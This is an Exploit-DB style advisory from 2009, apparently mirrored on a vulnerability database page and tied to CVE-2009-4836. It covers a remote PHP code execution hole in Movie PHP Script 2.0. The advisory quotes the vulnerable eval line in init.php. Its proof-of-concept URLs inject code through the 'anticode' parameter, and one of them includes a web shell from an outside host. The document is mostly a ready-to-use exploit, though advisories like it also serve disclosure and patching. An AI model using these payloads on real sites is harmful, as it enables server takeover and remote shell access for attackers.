Lucene search
SirGodEDB-ID:8871HistoryJun 03, 2009 - 12:00 a.m.
Movie PHP Script 2.0 - 'init.php?anticode' Code Execution
2009-06-0300:00:00
SirGod
www.exploit-db.com
29
#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Remote PHP Code Execution
- Vulnerable code in system/services/init.php :
---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------
- PoC :
http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]
- Example :
http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";
- Example 2 :
http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();
#################################################################################################################
# milw0rm.com [2009-06-03]Related
nvd
nvd
CVE-2009-4836
2010-05-06 12:47:23
cve
cve
CVE-2009-4836
2010-05-06 12:47:23
cvelist
cvelist
CVE-2009-4836
2010-05-05 18:00:00
prion
prion
Sql injection
2010-05-06 12:47:00